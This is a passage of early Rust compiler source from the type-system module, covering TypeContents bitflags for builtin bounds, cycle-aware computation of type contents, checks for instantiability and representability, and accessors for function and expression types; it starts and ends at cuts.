Things that prevent values from being considered sized Nonsized = 0b0000_0000__0000_0000__0001, // Things that prevent values from being shared Nonsharable = 0b0001_0000__0000_0000__0000, // Things that make values considered not POD (would be same // as `Moves`, but for the fact that managed data `@` is // not considered POD) Noncopy = 0b0000_0000__0000_1111__0000, // Bits to set when a managed value is encountered // // [1] Do not set the bits TC::OwnsManaged or // TC::ReachesManaged directly, instead reference // TC::Managed to set them both at once. 
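// (Illustrative note: TC::Managed below is exactly
// TC::OwnsManaged | TC::ReachesManaged.)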
Managed = 0b0000_0100__0000_0100__0000, // All bits All = 0b1111_1111__1111_1111__1111 } ) impl TypeContents { pub fn meets_bounds(&self, cx: &ctxt, bbs: BuiltinBounds) -> bool { bbs.iter().all(|bb| self.meets_bound(cx, bb)) } pub fn meets_bound(&self, cx: &ctxt, bb: BuiltinBound) -> bool { match bb { BoundStatic => self.is_static(cx), BoundSend => self.is_sendable(cx), BoundSized => self.is_sized(cx), BoundCopy => self.is_copy(cx), BoundShare => self.is_sharable(cx), } } pub fn when(&self, cond: bool) -> TypeContents { if cond {*self} else {TC::None} } pub fn intersects(&self, tc: TypeContents) -> bool { (self.bits & tc.bits) != 0 } pub fn is_static(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonstatic) } pub fn is_sendable(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsendable) } pub fn is_sharable(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsharable) } pub fn owns_managed(&self) -> bool { self.intersects(TC::OwnsManaged) } pub fn owns_owned(&self) -> bool { self.intersects(TC::OwnsOwned) } pub fn is_sized(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsized) } pub fn is_copy(&self, _: &ctxt) -> bool { !self.intersects(TC::Noncopy) } pub fn interior_unsafe(&self) -> bool { self.intersects(TC::InteriorUnsafe) } pub fn moves_by_default(&self, _: &ctxt) -> bool { self.intersects(TC::Moves) } pub fn needs_drop(&self, _: &ctxt) -> bool { self.intersects(TC::NeedsDrop) } pub fn owned_pointer(&self) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a `~` pointer */ TC::OwnsOwned | ( *self & (TC::OwnsAll | TC::ReachesAll)) } pub fn reference(&self, bits: TypeContents) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a reference (`&`) */ bits | ( *self & TC::ReachesAll) } pub fn managed_pointer(&self) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a managed pointer (`@`) */ TC::Managed | ( *self & TC::ReachesAll) } pub fn unsafe_pointer(&self) -> TypeContents { /*! 
* Includes only those bits that still apply * when indirected through an unsafe pointer (`*`) */ *self & TC::ReachesAll } pub fn union<T>(v: &[T], f: |&T| -> TypeContents) -> TypeContents { v.iter().fold(TC::None, |tc, t| tc | f(t)) } pub fn inverse(&self) -> TypeContents { TypeContents { bits: !self.bits } } pub fn has_dtor(&self) -> bool { self.intersects(TC::OwnsDtor) } } impl ops::BitOr<TypeContents,TypeContents> for TypeContents { fn bitor(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits | other.bits} } } impl ops::BitAnd<TypeContents,TypeContents> for TypeContents { fn bitand(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits & other.bits} } } impl ops::Sub<TypeContents,TypeContents> for TypeContents { fn sub(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits & !other.bits} } } impl fmt::Show for TypeContents { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "TypeContents({:t})", self.bits) } } pub fn type_has_dtor(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).has_dtor() } pub fn type_is_static(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).is_static(cx) } pub fn type_is_sendable(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).is_sendable(cx) } pub fn type_interior_is_unsafe(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).interior_unsafe() } pub fn type_contents(cx: &ctxt, ty: t) -> TypeContents { let ty_id = type_id(ty); match cx.tc_cache.borrow().find(&ty_id) { Some(tc) => { return *tc; } None => {} } let mut cache = HashMap::new(); let result = tc_ty(cx, ty, &mut cache); cx.tc_cache.borrow_mut().insert(ty_id, result); return result; fn tc_ty(cx: &ctxt, ty: t, cache: &mut HashMap<uint, TypeContents>) -> TypeContents { // Subtle: Note that we are *not* using cx.tc_cache here but rather a // private cache for this walk. This is needed in the case of cyclic // types like: // // struct List { next: ~Option<List>, ... } // // When computing the type contents of such a type, we wind up deeply // recursing as we go. So when we encounter the recursive reference // to List, we temporarily use TC::None as its contents. Later we'll // patch up the cache with the correct value, once we've computed it // (this is basically a co-inductive process, if that helps). So in // the end we'll compute TC::OwnsOwned, in this case. // // The problem is, as we are doing the computation, we will also // compute an *intermediate* contents for, e.g., Option<List> of // TC::None. This is ok during the computation of List itself, but if // we stored this intermediate value into cx.tc_cache, then later // requests for the contents of Option<List> would also yield TC::None // which is incorrect. This value was computed based on the crutch // value for the type contents of list. The correct value is // TC::OwnsOwned. This manifested as issue #4821. let ty_id = type_id(ty); match cache.find(&ty_id) { Some(tc) => { return *tc; } None => {} } match cx.tc_cache.borrow().find(&ty_id) { // Must check both caches! 
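// (A hit in the private `cache` means we are revisiting a type within
// the current walk and may see a provisional value; a hit in
// `cx.tc_cache` is a final result from a previously completed walk.)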
            Some(tc) => { return *tc; }
            None => {}
        }
        cache.insert(ty_id, TC::None);

        let result = match get(ty).sty {
            // Scalar and unique types are sendable, and durable
            ty_nil | ty_bot | ty_bool | ty_int(_) | ty_uint(_) | ty_float(_) |
            ty_bare_fn(_) | ty::ty_char => {
                TC::None
            }

            ty_str(vstore_uniq) => {
                TC::OwnsOwned
            }

            ty_closure(ref c) => {
                closure_contents(cx, *c)
            }

            ty_box(typ) => {
                tc_ty(cx, typ, cache).managed_pointer()
            }

            ty_uniq(typ) => {
                tc_ty(cx, typ, cache).owned_pointer()
            }

            ty_trait(~ty::TyTrait { store, mutability, bounds, .. }) => {
                object_contents(cx, store, mutability, bounds)
            }

            ty_ptr(ref mt) => {
                tc_ty(cx, mt.ty, cache).unsafe_pointer()
            }

            ty_rptr(r, ref mt) => {
                tc_ty(cx, mt.ty, cache).reference(
                    borrowed_contents(r, mt.mutbl))
            }

            ty_vec(mt, vstore_uniq) => {
                tc_mt(cx, mt, cache).owned_pointer()
            }

            ty_vec(ref mt, vstore_slice(r)) => {
                tc_ty(cx, mt.ty, cache).reference(
                    borrowed_contents(r, mt.mutbl))
            }

            ty_vec(mt, vstore_fixed(_)) => {
                tc_mt(cx, mt, cache)
            }

            ty_str(vstore_slice(r)) => {
                borrowed_contents(r, ast::MutImmutable)
            }

            ty_str(vstore_fixed(_)) => {
                TC::None
            }

            ty_struct(did, ref substs) => {
                let flds = struct_fields(cx, did, substs);
                let mut res =
                    TypeContents::union(flds.as_slice(),
                                        |f| tc_mt(cx, f.mt, cache));
                if ty::has_dtor(cx, did) {
                    res = res | TC::OwnsDtor;
                }
                apply_lang_items(cx, did, res)
            }

            ty_tup(ref tys) => {
                TypeContents::union(tys.as_slice(),
                                    |ty| tc_ty(cx, *ty, cache))
            }

            ty_enum(did, ref substs) => {
                let variants = substd_enum_variants(cx, did, substs);
                let res =
                    TypeContents::union(variants.as_slice(), |variant| {
                        TypeContents::union(variant.args.as_slice(),
                                            |arg_ty| {
                            tc_ty(cx, *arg_ty, cache)
                        })
                    });
                apply_lang_items(cx, did, res)
            }

            ty_param(p) => {
                // We only ever ask for the kind of types that are defined in
                // the current crate; therefore, the only type parameters that
                // could be in scope are those defined in the current crate.
                // If this assertion fails, it is likely because of a
                // failure in the cross-crate inlining code to translate a
                // def-id.
                assert_eq!(p.def_id.krate, ast::LOCAL_CRATE);

                let ty_param_defs = cx.ty_param_defs.borrow();
                let tp_def = ty_param_defs.get(&p.def_id.node);
                kind_bounds_to_contents(cx,
                                        tp_def.bounds.builtin_bounds,
                                        tp_def.bounds.trait_bounds.as_slice())
            }

            ty_self(def_id) => {
                // FIXME(#4678)---self should just be a ty param
                // Self may be bounded if the associated trait has builtin kinds
                // for supertraits. If so we can use those bounds.
                let trait_def = lookup_trait_def(cx, def_id);
                let traits = [trait_def.trait_ref];
                kind_bounds_to_contents(cx, trait_def.bounds, traits)
            }

            ty_infer(_) => {
                // This occurs during coherence, but shouldn't occur at other
                // times.
                TC::All
            }

            ty_unboxed_vec(mt) => TC::InteriorUnsized | tc_mt(cx, mt, cache),

            ty_err => {
                cx.sess.bug("asked to compute contents of error type");
            }
        };

        cache.insert(ty_id, result);
        return result;
    }

    fn tc_mt(cx: &ctxt,
             mt: mt,
             cache: &mut HashMap<uint, TypeContents>) -> TypeContents {
        let mc = TC::ReachesMutable.when(mt.mutbl == MutMutable);
        mc | tc_ty(cx, mt.ty, cache)
    }

    fn apply_lang_items(cx: &ctxt,
                        did: ast::DefId,
                        tc: TypeContents) -> TypeContents {
        if Some(did) == cx.lang_items.no_send_bound() {
            tc | TC::ReachesNonsendAnnot
        } else if Some(did) == cx.lang_items.managed_bound() {
            tc | TC::Managed
        } else if Some(did) == cx.lang_items.no_copy_bound() {
            tc | TC::OwnsAffine
        } else if Some(did) == cx.lang_items.no_share_bound() {
            tc | TC::ReachesNoShare
        } else if Some(did) == cx.lang_items.unsafe_type() {
            tc | TC::InteriorUnsafe
        } else {
            tc
        }
    }

    fn borrowed_contents(region: ty::Region,
                         mutbl: ast::Mutability) -> TypeContents {
        /*!
         * Type contents due to containing a reference
         * with the region `region` and mutability `mutbl`
         */
        let b = match mutbl {
            ast::MutMutable => TC::ReachesMutable | TC::OwnsAffine,
            ast::MutImmutable => TC::None,
        };
        b | (TC::ReachesBorrowed).when(region != ty::ReStatic)
    }

    fn closure_contents(cx: &ctxt, cty: &ClosureTy) -> TypeContents {
        // Closure contents are just like trait contents, but with potentially
        // even more stuff.
        let st = match cty.sigil {
            ast::BorrowedSigil =>
                object_contents(cx, RegionTraitStore(cty.region), MutMutable,
                                cty.bounds),
            ast::OwnedSigil =>
                object_contents(cx, UniqTraitStore, MutImmutable, cty.bounds),
            ast::ManagedSigil => unreachable!()
        };

        // FIXME(#3569): This borrowed_contents call should be taken care of in
        // object_contents, after ~Traits and @Traits can have region bounds too.
        // This one here is redundant for &fns but important for ~fns and @fns.
        let rt = borrowed_contents(cty.region, ast::MutImmutable);

        // This also prohibits "@once fn" from being copied, which allows it to
        // be called. Neither way really makes much sense.
        let ot = match cty.onceness {
            ast::Once => TC::OwnsAffine,
            ast::Many => TC::None,
        };

        st | rt | ot
    }

    fn object_contents(cx: &ctxt,
                       store: TraitStore,
                       mutbl: ast::Mutability,
                       bounds: BuiltinBounds) -> TypeContents {
        // These are the type contents of the (opaque) interior
        let contents = TC::ReachesMutable.when(mutbl == ast::MutMutable) |
            kind_bounds_to_contents(cx, bounds, []);

        match store {
            UniqTraitStore => {
                contents.owned_pointer()
            }
            RegionTraitStore(r) => {
                contents.reference(borrowed_contents(r, mutbl))
            }
        }
    }

    fn kind_bounds_to_contents(cx: &ctxt,
                               bounds: BuiltinBounds,
                               traits: &[@TraitRef]) -> TypeContents {
        let _i = indenter();
        let mut tc = TC::All;
        each_inherited_builtin_bound(cx, bounds, traits, |bound| {
            tc = tc - match bound {
                BoundStatic => TC::Nonstatic,
                BoundSend => TC::Nonsendable,
                BoundSized => TC::Nonsized,
                BoundCopy => TC::Noncopy,
                BoundShare => TC::Nonsharable,
            };
        });
        return tc;

        // Iterates over all builtin bounds on the type parameter def, including
        // those inherited from traits with builtin-kind-supertraits.
        fn each_inherited_builtin_bound(cx: &ctxt,
                                        bounds: BuiltinBounds,
                                        traits: &[@TraitRef],
                                        f: |BuiltinBound|) {
            for bound in bounds.iter() {
                f(bound);
            }

            each_bound_trait_and_supertraits(cx, traits, |trait_ref| {
                let trait_def = lookup_trait_def(cx, trait_ref.def_id);
                for bound in trait_def.bounds.iter() {
                    f(bound);
                }
                true
            });
        }
    }
}

pub fn type_moves_by_default(cx: &ctxt, ty: t) -> bool {
    type_contents(cx, ty).moves_by_default(cx)
}

// True if it is possible to instantiate an instance of `r_ty` without
// requiring, in turn, an instance of `r_ty` itself.
pub fn is_instantiable(cx: &ctxt, r_ty: t) -> bool {
    fn type_requires(cx: &ctxt, seen: &mut Vec<DefId>,
                     r_ty: t, ty: t) -> bool {
        debug!("type_requires({}, {})?",
               ::util::ppaux::ty_to_str(cx, r_ty),
               ::util::ppaux::ty_to_str(cx, ty));

        let r = {
            get(r_ty).sty == get(ty).sty ||
                subtypes_require(cx, seen, r_ty, ty)
        };

        debug!("type_requires({}, {})? {}",
               ::util::ppaux::ty_to_str(cx, r_ty),
               ::util::ppaux::ty_to_str(cx, ty),
               r);
        return r;
    }

    fn subtypes_require(cx: &ctxt, seen: &mut Vec<DefId>,
                        r_ty: t, ty: t) -> bool {
        debug!("subtypes_require({}, {})?",
               ::util::ppaux::ty_to_str(cx, r_ty),
               ::util::ppaux::ty_to_str(cx, ty));

        let r = match get(ty).sty {
            // fixed length vectors need special treatment compared to
            // normal vectors, since they don't necessarily have the
            // possibility to have length zero.
            ty_vec(_, vstore_fixed(0)) => false, // don't need no contents
            ty_vec(mt, vstore_fixed(_)) => type_requires(cx, seen, r_ty, mt.ty),

            ty_nil |
            ty_bot |
            ty_bool |
            ty_char |
            ty_int(_) |
            ty_uint(_) |
            ty_float(_) |
            ty_str(_) |
            ty_bare_fn(_) |
            ty_closure(_) |
            ty_infer(_) |
            ty_err |
            ty_param(_) |
            ty_self(_) |
            ty_vec(_, _) |
            ty_unboxed_vec(_) => {
                false
            }
            ty_box(typ) | ty_uniq(typ) => {
                type_requires(cx, seen, r_ty, typ)
            }
            ty_rptr(_, ref mt) => {
                type_requires(cx, seen, r_ty, mt.ty)
            }

            ty_ptr(..) => {
                false           // unsafe ptrs can always be NULL
            }

            ty_trait(..) => {
                false
            }

            ty_struct(ref did, _) if seen.contains(did) => {
                false
            }

            ty_struct(did, ref substs) => {
                seen.push(did);
                let fields = struct_fields(cx, did, substs);
                let r = fields.iter().any(|f| type_requires(cx, seen, r_ty, f.mt.ty));
                seen.pop().unwrap();
                r
            }

            ty_tup(ref ts) => {
                ts.iter().any(|t| type_requires(cx, seen, r_ty, *t))
            }

            ty_enum(ref did, _) if seen.contains(did) => {
                false
            }

            ty_enum(did, ref substs) => {
                seen.push(did);
                let vs = enum_variants(cx, did);
                let r = !vs.is_empty() && vs.iter().all(|variant| {
                    variant.args.iter().any(|aty| {
                        let sty = subst(cx, substs, *aty);
                        type_requires(cx, seen, r_ty, sty)
                    })
                });
                seen.pop().unwrap();
                r
            }
        };

        debug!("subtypes_require({}, {})? {}",
               ::util::ppaux::ty_to_str(cx, r_ty),
               ::util::ppaux::ty_to_str(cx, ty),
               r);

        return r;
    }

    let mut seen = Vec::new();
    !subtypes_require(cx, &mut seen, r_ty, r_ty)
}

/// Describes whether a type is representable. For types that are not
/// representable, 'SelfRecursive' and 'ContainsRecursive' are used to
/// distinguish between types that are recursive with themselves and types that
/// contain a different recursive type. These cases can therefore be treated
/// differently when reporting errors.
#[deriving(Eq)]
pub enum Representability {
    Representable,
    SelfRecursive,
    ContainsRecursive,
}

/// Check whether a type is representable. This means it cannot contain unboxed
/// structural recursion. This check is needed for structs and enums.
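/// For example (illustrative): `struct S { s: S }` is SelfRecursive, while
/// `struct S { s: ~S }` is Representable, since the recursion passes
/// through a pointer and the struct therefore has a finite size.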
pub fn is_type_representable(cx: &ctxt, ty: t) -> Representability { // Iterate until something non-representable is found fn find_nonrepresentable<It: Iterator<t>>(cx: &ctxt, seen: &mut Vec<DefId>, mut iter: It) -> Representability { for ty in iter { let r = type_structurally_recursive(cx, seen, ty); if r != Representable { return r } } Representable } // Does the type `ty` directly (without indirection through a pointer) // contain any types on stack `seen`? fn type_structurally_recursive(cx: &ctxt, seen: &mut Vec<DefId>, ty: t) -> Representability { debug!("type_structurally_recursive: {}", ::util::ppaux::ty_to_str(cx, ty)); // Compare current type to previously seen types match get(ty).sty { ty_struct(did, _) | ty_enum(did, _) => { for (i, &seen_did) in seen.iter().enumerate() { if did == seen_did { return if i == 0 { SelfRecursive } else { ContainsRecursive } } } } _ => (), } // Check inner types match get(ty).sty { // Tuples ty_tup(ref ts) => { find_nonrepresentable(cx, seen, ts.iter().map(|t| *t)) } // Fixed-length vectors. // FIXME(#11924) Behavior undecided for zero-length vectors. ty_vec(mt, vstore_fixed(_)) => { type_structurally_recursive(cx, seen, mt.ty) } // Push struct and enum def-ids onto `seen` before recursing. ty_struct(did, ref substs) => { seen.push(did); let fields = struct_fields(cx, did, substs); let r = find_nonrepresentable(cx, seen, fields.iter().map(|f| f.mt.ty)); seen.pop(); r } ty_enum(did, ref substs) => { seen.push(did); let vs = enum_variants(cx, did); let mut r = Representable; for variant in vs.iter() { let iter = variant.args.iter().map(|aty| subst(cx, substs, *aty)); r = find_nonrepresentable(cx, seen, iter); if r != Representable { break } } seen.pop(); r } _ => Representable, } } debug!("is_type_representable: {}", ::util::ppaux::ty_to_str(cx, ty)); // To avoid a stack overflow when checking an enum variant or struct that // contains a different, structurally recursive type, maintain a stack // of seen types and check recursion for each of them (issues #3008, #3779). let mut seen: Vec<DefId> = Vec::new(); type_structurally_recursive(cx, &mut seen, ty) } pub fn type_is_trait(ty: t) -> bool { match get(ty).sty { ty_trait(..) => true, _ => false } } pub fn type_is_integral(ty: t) -> bool { match get(ty).sty { ty_infer(IntVar(_)) | ty_int(_) | ty_uint(_) => true, _ => false } } pub fn type_is_char(ty: t) -> bool { match get(ty).sty { ty_char => true, _ => false } } pub fn type_is_bare_fn(ty: t) -> bool { match get(ty).sty { ty_bare_fn(..) => true, _ => false } } pub fn type_is_fp(ty: t) -> bool { match get(ty).sty { ty_infer(FloatVar(_)) | ty_float(_) => true, _ => false } } pub fn type_is_numeric(ty: t) -> bool { return type_is_integral(ty) || type_is_fp(ty); } pub fn type_is_signed(ty: t) -> bool { match get(ty).sty { ty_int(_) => true, _ => false } } pub fn type_is_machine(ty: t) -> bool { match get(ty).sty { ty_int(ast::TyI) | ty_uint(ast::TyU) => false, ty_int(..) | ty_uint(..) | ty_float(..) => true, _ => false } } pub fn type_is_enum(ty: t) -> bool { match get(ty).sty { ty_enum(_, _) => return true, _ => return false } } // Is the type's representation size known at compile time? pub fn type_is_sized(cx: &ctxt, ty: ty::t) -> bool { match get(ty).sty { // FIXME(#6308) add trait, vec, str, etc here. 
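// (As written, an unbounded type parameter is the only case reported as
// unsized: everything else, including the trait/vec/str cases noted in
// the FIXME, falls through to `true` below.)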
        ty_param(p) => {
            let ty_param_defs = cx.ty_param_defs.borrow();
            let param_def = ty_param_defs.get(&p.def_id.node);
            if param_def.bounds.builtin_bounds.contains_elem(BoundSized) {
                return true;
            }
            return false;
        },
        _ => return true,
    }
}

// Whether a type is enum-like, that is, an enum type with only nullary
// constructors
pub fn type_is_c_like_enum(cx: &ctxt, ty: t) -> bool {
    match get(ty).sty {
        ty_enum(did, _) => {
            let variants = enum_variants(cx, did);
            if variants.len() == 0 {
                false
            } else {
                variants.iter().all(|v| v.args.len() == 0)
            }
        }
        _ => false
    }
}

pub fn type_param(ty: t) -> Option<uint> {
    match get(ty).sty {
        ty_param(p) => return Some(p.idx),
        _ => {/* fall through */ }
    }
    return None;
}

// Returns the type and mutability of *t.
//
// The parameter `explicit` indicates if this is an *explicit* dereference.
// Some types---notably unsafe ptrs---can only be dereferenced explicitly.
pub fn deref(t: t, explicit: bool) -> Option<mt> {
    match get(t).sty {
        ty_box(typ) | ty_uniq(typ) => Some(mt {
            ty: typ,
            mutbl: ast::MutImmutable,
        }),
        ty_rptr(_, mt) => Some(mt),
        ty_ptr(mt) if explicit => Some(mt),
        _ => None
    }
}

// Returns the type and mutability of t[i]
pub fn index(t: t) -> Option<mt> {
    match get(t).sty {
        ty_vec(mt, _) => Some(mt),
        ty_str(_) => Some(mt {ty: mk_u8(), mutbl: ast::MutImmutable}),
        _ => None
    }
}

pub fn node_id_to_trait_ref(cx: &ctxt, id: ast::NodeId) -> @ty::TraitRef {
    match cx.trait_refs.borrow().find(&id) {
        Some(&t) => t,
        None => cx.sess.bug(
            format!("node_id_to_trait_ref: no trait ref for node `{}`",
                    cx.map.node_to_str(id)))
    }
}

pub fn try_node_id_to_type(cx: &ctxt, id: ast::NodeId) -> Option<t> {
    cx.node_types.borrow().find_copy(&(id as uint))
}

pub fn node_id_to_type(cx: &ctxt, id: ast::NodeId) -> t {
    match try_node_id_to_type(cx, id) {
        Some(t) => t,
        None => cx.sess.bug(
            format!("node_id_to_type: no type for node `{}`",
                    cx.map.node_to_str(id)))
    }
}

pub fn node_id_to_type_opt(cx: &ctxt, id: ast::NodeId) -> Option<t> {
    match cx.node_types.borrow().find(&(id as uint)) {
        Some(&t) => Some(t),
        None => None
    }
}

// FIXME(pcwalton): Makes a copy, bleh. Probably better to not do that.
pub fn node_id_to_type_params(cx: &ctxt, id: ast::NodeId) -> Vec<t> {
    match cx.node_type_substs.borrow().find(&id) {
        None => return Vec::new(),
        Some(ts) => return (*ts).clone(),
    }
}

fn node_id_has_type_params(cx: &ctxt, id: ast::NodeId) -> bool {
    cx.node_type_substs.borrow().contains_key(&id)
}

pub fn fn_is_variadic(fty: t) -> bool {
    match get(fty).sty {
        ty_bare_fn(ref f) => f.sig.variadic,
        ty_closure(ref f) => f.sig.variadic,
        ref s => {
            fail!("fn_is_variadic() called on non-fn type: {:?}", s)
        }
    }
}

pub fn ty_fn_sig(fty: t) -> FnSig {
    match get(fty).sty {
        ty_bare_fn(ref f) => f.sig.clone(),
        ty_closure(ref f) => f.sig.clone(),
        ref s => {
            fail!("ty_fn_sig() called on non-fn type: {:?}", s)
        }
    }
}

// Type accessors for substructures of types
pub fn ty_fn_args(fty: t) -> Vec<t> {
    match get(fty).sty {
        ty_bare_fn(ref f) => f.sig.inputs.clone(),
        ty_closure(ref f) => f.sig.inputs.clone(),
        ref s => {
            fail!("ty_fn_args() called on non-fn type: {:?}", s)
        }
    }
}

pub fn ty_closure_sigil(fty: t) -> Sigil {
    match get(fty).sty {
        ty_closure(ref f) => f.sigil,
        ref s => {
            fail!("ty_closure_sigil() called on non-closure type: {:?}", s)
        }
    }
}

pub fn ty_fn_purity(fty: t) -> ast::Purity {
    match get(fty).sty {
        ty_bare_fn(ref f) => f.purity,
        ty_closure(ref f) => f.purity,
        ref s => {
            fail!("ty_fn_purity() called on non-fn type: {:?}", s)
        }
    }
}

pub fn ty_fn_ret(fty: t) -> t {
    match get(fty).sty {
        ty_bare_fn(ref f) => f.sig.output,
        ty_closure(ref f) => f.sig.output,
        ref s => {
            fail!("ty_fn_ret() called on non-fn type: {:?}", s)
        }
    }
}

pub fn is_fn_ty(fty: t) -> bool {
    match get(fty).sty {
        ty_bare_fn(_) => true,
        ty_closure(_) => true,
        _ => false
    }
}

pub fn ty_vstore(ty: t) -> vstore {
    match get(ty).sty {
        ty_vec(_, vstore) => vstore,
        ty_str(vstore) => vstore,
        ref s => fail!("ty_vstore() called on invalid sty: {:?}", s)
    }
}

pub fn ty_region(tcx: &ctxt,
                 span: Span,
                 ty: t) -> Region {
    match get(ty).sty {
        ty_rptr(r, _) => r,
        ty_vec(_, vstore_slice(r)) => r,
        ty_str(vstore_slice(r)) => r,
        ref s => {
            tcx.sess.span_bug(
                span,
                format!("ty_region() invoked on inappropriate ty: {:?}", s));
        }
    }
}

pub fn replace_fn_sig(cx: &ctxt, fsty: &sty, new_sig: FnSig) -> t {
    match *fsty {
        ty_bare_fn(ref f) => mk_bare_fn(cx, BareFnTy {sig: new_sig, ..*f}),
        ty_closure(ref f) => mk_closure(cx, ClosureTy {sig: new_sig, ..**f}),
        ref s => {
            cx.sess.bug(
                format!("replace_fn_sig() called on non-fn type: {:?}", s));
        }
    }
}

pub fn replace_closure_return_type(tcx: &ctxt, fn_type: t, ret_type: t) -> t {
    /*!
     *
     * Returns a new function type based on `fn_type` but returning a value of
     * type `ret_type` instead.
     */
    match ty::get(fn_type).sty {
        ty::ty_closure(ref fty) => {
            ty::mk_closure(tcx, ClosureTy {
                sig: FnSig {output: ret_type, ..fty.sig.clone()},
                ..(**fty).clone()
            })
        }
        _ => {
            tcx.sess.bug(format!(
                "replace_closure_return_type() invoked with non-fn-type: {}",
                ty_to_str(tcx, fn_type)));
        }
    }
}

// Returns a vec of all the input and output types of fty.
pub fn tys_in_fn_sig(sig: &FnSig) -> Vec<t> {
    sig.inputs.iter().map(|a| *a).collect::<Vec<_>>().append_one(sig.output)
}

// Type accessors for AST nodes
pub fn block_ty(cx: &ctxt, b: &ast::Block) -> t {
    return node_id_to_type(cx, b.id);
}

// Returns the type of a pattern as a monotype. Like @expr_ty, this function
// doesn't provide type parameter substitutions.
pub fn pat_ty(cx: &ctxt, pat: &ast::Pat) -> t {
    return node_id_to_type(cx, pat.id);
}

// Returns the type of an expression as a monotype.
//
// NB (1): This is the PRE-ADJUSTMENT TYPE for the expression. That is, in
// some cases, we insert `AutoAdjustment` annotations such as auto-deref or
// auto-ref. The type returned by this function does not consider such
// adjustments. See `expr_ty_adjusted()` instead.
//
// NB (2): This type doesn't provide type parameter substitutions; e.g. if you
// ask for the type of "id" in "id(3)", it will return "fn(&int) -> int"
// instead of "fn(T) -> T with T = int". If this isn't what you want, see
// expr_ty_params_and_ty() below.
pub fn expr_ty(cx: &ctxt, expr: &ast::Expr) -> t {
    return node_id_to_type(cx, expr.id);
}

pub fn expr_ty_opt(cx: &ctxt, expr: &ast::Expr) -> Option<t> {
    return node_id_to_type_opt(cx, expr.id);
}

pub fn expr_ty_adjusted(cx: &ctxt,
                        expr: &ast::Expr,
                        method_map: &FnvHashMap<MethodCall, MethodCallee>)
                        -> t {
    /*!
     *
     * Returns the type of `expr`, considering any `AutoAdjustment`
     * entry recorded for that expression.
     *
     * It would almost certainly be better to store the adjusted ty in with
     * the `AutoAdjustment`, but I opted not to do this because it would
     * require serializing and deserializing the type and, although that's not
     * hard to do, I just hate that code so much I didn't want to touch it
     * unless it was to fix it properly, which seemed a distraction from the
     * task at hand! -nmatsakis
     */

    let unadjusted_ty = expr_ty(cx, expr);
    let adjustment = cx.adjustments.borrow().find_copy(&expr.id);
    adjust_ty(cx, expr.span, expr.id, unadjusted_ty, adjustment, |method_call| {
        method_map.find(&method_call).map(|method| method.ty)
    })
}

pub fn expr_span(cx: &ctxt, id: NodeId) -> Span {
    match cx.map.find(id) {
        Some(ast_map::NodeExpr(e)) => {
            e.span
        }
        Some(f) => {
            cx.sess.bug(format!("Node id {} is not an expr: {:?}", id, f));
        }
        None => {
            cx.sess.bug(format!("Node id {} is not present \
                                in the node map", id));
        }
    }
}

pub fn local_var_name_str(cx: &ctxt, id: NodeId) -> InternedString {
    match cx.map.find(id) {
        Some(ast_map::NodeLocal(pat)) => {
            match pat.node {
                ast::PatIdent(_, ref path, _) => {
                    token::get_ident(ast_util::path_to_ident(path))
                }
                _ => {
                    cx.sess.bug(
                        format!("Variable id {} maps to {:?}, not local",
                                id, pat));
                }
            }
        }
        r => {
            cx.sess.bug(
                format!("Variable id {} maps to {:?}, not local", id, r));
        }
    }
}

pub fn adjust_ty(cx: &ctxt,
                 span: Span,
                 expr_id: ast::NodeId,
                 unadjusted_ty: ty::t,
                 adjustment: Option<@AutoAdjustment>,
                 method_type: |MethodCall| -> Option<ty::t>)
                 -> ty::t {
    /*!
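     * Applies any adjustment recorded for `expr_id` to `unadjusted_ty`:
     * adding a closure environment, a chain of autoderefs (possibly
     * overloaded, hence the `method_type` lookup) plus an optional
     * autoref, or coercion to a trait object.
     *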
See `expr_ty_adjusted` */ return match adjustment { Some(adjustment) => { match *adjustment { AutoAddEnv(r, s) => { match ty::get(unadjusted_ty).sty { ty::ty_bare_fn(ref b) => { ty::mk_closure( cx, ty::ClosureTy {purity: b.purity, sigil: s, onceness: ast::Many, region: r, bounds: ty::AllBuiltinBounds(), sig: b.sig.clone()}) } ref b => { cx.sess.bug( format!("add_env adjustment on non-bare-fn: \ {:?}", b)); } } } AutoDerefRef(ref adj) => { let mut adjusted_ty = unadjusted_ty; if !ty::type_is_error(adjusted_ty) { for i in range(0, adj.autoderefs) { match method_type(MethodCall::autoderef(expr_id, i as u32)) { Some(method_ty) => { adjusted_ty = ty_fn_ret(method_ty); } None => {} } match deref(adjusted_ty, true) { Some(mt) => { adjusted_ty = mt.ty; } None => { cx.sess.span_bug( span, format!("the {}th autoderef failed: \ {}", i, ty_to_str(cx, adjusted_ty))); } } } } match adj.autoref { None => adjusted_ty, Some(ref autoref) => { match *autoref { AutoPtr(r, m) => { mk_rptr(cx, r, mt { ty: adjusted_ty, mutbl: m }) } AutoBorrowVec(r, m) => { borrow_vec(cx, span, r, m, adjusted_ty) } AutoBorrowVecRef(r, m) => { adjusted_ty = borrow_vec(cx, span, r, m, adjusted_ty); mk_rptr(cx, r, mt { ty: adjusted_ty, mutbl: ast::MutImmutable }) } AutoBorrowFn(r) => { borrow_fn(cx, span, r, adjusted_ty) } AutoUnsafe(m) => { mk_ptr(cx, mt {ty: adjusted_ty, mutbl: m}) } AutoBorrowObj(r, m) => { borrow_obj(cx, span, r, m, adjusted_ty) } } } } } AutoObject(ref sigil, ref region, m, b, def_id, ref substs) => { trait_adjustment_to_ty(cx, sigil, region, def_id, substs, m, b) } } } None => unadjusted_ty }; fn borrow_vec(cx: &ctxt, span: Span, r: Region, m: ast::Mutability, ty: ty::t) -> ty::t { match get(ty).sty { ty_vec(mt, _) => { ty::mk_vec(cx, mt {ty: mt.ty, mutbl: m}, vstore_slice(r)) } ty_str(_) => { ty::mk_str(cx, vstore_slice(r)) } ref s => { cx.sess.span_bug( span, format!("borrow-vec associated with bad sty: {:?}", s)); } } } fn borrow_fn(cx: 